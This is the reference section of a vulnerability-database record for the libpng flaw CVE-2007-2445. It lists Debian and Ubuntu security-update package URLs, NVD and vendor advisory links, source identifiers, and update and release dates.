url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_amd64.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_ia64.udeb

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2009-0040

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_arm.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny2.dsc

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_ia64.udeb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_mipsel.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_i386.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_s390.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_mipsel.udeb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_mipsel.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_powerpc.udeb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny2.diff.gz

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_mipsel.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_s390.deb

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2008-6218

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_armel.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_hppa.deb

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2008-5907

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_ia64.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_amd64.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_amd64.udeb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_i386.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_alpha.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_powerpc.udeb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5-1+etch2.dsc

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5-1+etch2.diff.gz

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_ia64.deb

Trust: 0.1

url:http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_ia64.deb

Trust: 0.1

url:http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5116

Trust: 0.1

url:http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5269

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2007-2741

Trust: 0.1

url:http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5135

Trust: 0.1

url:http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0160

Trust: 0.1

url:http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-2026

Trust: 0.1

url:http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5268

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2007-3108

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-0338

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2007-5849

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2007-1536

Trust: 0.1

url:http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-3108

Trust: 0.1

url:http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1969

Trust: 0.1

url:http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-1536

Trust: 0.1

url:http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5266

Trust: 0.1

url:http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-2741

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2010-1205

Trust: 0.1

url:http://creativecommons.org/licenses/by-sa/2.5

Trust: 0.1

url:http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1664

Trust: 0.1

url:http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0338

Trust: 0.1

url:http://security.gentoo.org/glsa/glsa-201412-11.xml

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2007-2026

Trust: 0.1

url:http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-0720

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-2877

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2007-5135

Trust: 0.1

url:http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0339

Trust: 0.1

url:http://security.gentoo.org/

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-1969

Trust: 0.1

url:http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-2445

Trust: 0.1

url:http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1205

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2007-0720

Trust: 0.1

url:http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-4995

Trust: 0.1

url:http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5849

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2007-4995

Trust: 0.1

url:http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2877

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-0339

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2007-5116

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-1664

Trust: 0.1

url:https://bugs.gentoo.org.

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2014-0160

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_amd64.deb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_powerpc.udeb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_sparc.deb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_i386.deb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-1ubuntu1.diff.gz

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_i386.deb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_i386.udeb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_sparc.deb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.2.dsc

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_powerpc.deb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_i386.deb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_i386.deb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_amd64.udeb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_amd64.deb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_sparc.deb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.15~beta5-1ubuntu1_all.deb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_sparc.udeb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_amd64.udeb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_amd64.deb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_powerpc.udeb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_sparc.deb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_powerpc.udeb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_i386.deb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_amd64.deb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.2.diff.gz

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_powerpc.deb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_i386.udeb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_amd64.deb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_amd64.udeb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5ubuntu0.2_all.deb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5.1ubuntu0.2_all.deb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_sparc.udeb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.2.diff.gz

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_sparc.deb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_sparc.deb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_i386.udeb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_i386.deb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_sparc.udeb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_amd64.deb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5.orig.tar.gz

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_powerpc.deb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-1ubuntu1.dsc

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_powerpc.deb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.2.dsc

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_powerpc.deb

Trust: 0.1

url:http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_powerpc.deb

Trust: 0.1

url:http://secunia.com/

Trust: 0.1

url:http://www.digicamsoft.com/bmp/bmp.html

Trust: 0.1

url:http://www.coresecurity.com.

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2007-5267

Trust: 0.1

url:http://code.google.com/android/adc.html

Trust: 0.1

url:http://enigmail.mozdev.org

Trust: 0.1

url:http://www.washingtonpost.com/wp-dyn/content/article/2008/02/11/ar2008021101944.html

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2008-0986

Trust: 0.1

url:http://www.infoworld.com/article/08/02/27/09tc-google-android_1.html

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2008-0985

Trust: 0.1

url:http://www.w3.org/tr/png/

Trust: 0.1

url:http://www.smh.com.au/news/biztech/allo-allo-android/2008/02/26/1203788290737.html

Trust: 0.1

url:http://code.google.com/p/android/issues

Trust: 0.1

url:http://www.coresecurity.com/corelabs

Trust: 0.1

url:http://lists.grok.org.uk/full-disclosure-charter.html

Trust: 0.1

url:http://www.wiley.com/wileycda/wileytitle/productcd-047008023x.html

Trust: 0.1

url:http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

Trust: 0.1

url:http://www.openhandsetalliance.com/android_overview.html

Trust: 0.1

url:http://www.w3.org/graphics/gif/spec-gif89a.txt

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2006-5793

Trust: 0.1

url:http://www.coresecurity.com/corelabs/.

Trust: 0.1

url:http://code.google.com/p/android/downloads/list

Trust: 0.1

url:http://openpkg.com/security/signatures/

Trust: 0.1

url:http://openpkg.org/go/package/png

Trust: 0.1

url:http://openpkg.com/>

Trust: 0.1

url:http://openpkg.com/

Trust: 0.1

url:http://www.libpng.org/pub/png/

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-2445

Trust: 0.1

url:http://openpkg.com/go/openpkg-sa

Trust: 0.1

url:http://openpkg.com/openpkg.com.pgp

Trust: 0.1

sources: CERT/CC: VU#684664 // BID: 24000 // BID: 24023 // PACKETSTORM: 68410 // PACKETSTORM: 75976 // PACKETSTORM: 129524 // PACKETSTORM: 57151 // PACKETSTORM: 64260 // PACKETSTORM: 56849 // CNNVD: CNNVD-200705-347 // NVD: CVE-2007-2445

CREDITS

The vendor reported this issue.

Trust: 0.6

sources: BID: 24000 // BID: 24023

SOURCES

db:CERT/CCid:VU#684664
db:BIDid:24000
db:BIDid:24023
db:PACKETSTORMid:68410
db:PACKETSTORMid:75976
db:PACKETSTORMid:129524
db:PACKETSTORMid:57151
db:PACKETSTORMid:64260
db:PACKETSTORMid:56849
db:CNNVDid:CNNVD-200705-347
db:NVDid:CVE-2007-2445

LAST UPDATE DATE

2024-11-19T20:16:02.042000+00:00


SOURCES UPDATE DATE

db:CERT/CCid:VU#684664date:2007-08-23T00:00:00
db:BIDid:24000date:2009-03-23T15:56:00
db:BIDid:24023date:2007-05-30T00:04:00
db:CNNVDid:CNNVD-200705-347date:2009-03-26T00:00:00
db:NVDid:CVE-2007-2445date:2018-10-16T16:43:36.383

SOURCES RELEASE DATE

db:CERT/CCid:VU#684664date:2007-05-16T00:00:00
db:BIDid:24000date:2007-05-15T00:00:00
db:BIDid:24023date:2007-05-16T00:00:00
db:PACKETSTORMid:68410date:2008-07-22T17:59:59
db:PACKETSTORMid:75976date:2009-03-24T04:24:53
db:PACKETSTORMid:129524date:2014-12-12T17:43:12
db:PACKETSTORMid:57151date:2007-06-13T00:51:14
db:PACKETSTORMid:64260date:2008-03-04T22:33:55
db:PACKETSTORMid:56849date:2007-05-21T03:50:57
db:CNNVDid:CNNVD-200705-347date:2007-05-16T00:00:00
db:NVDid:CVE-2007-2445date:2007-05-16T22:30:00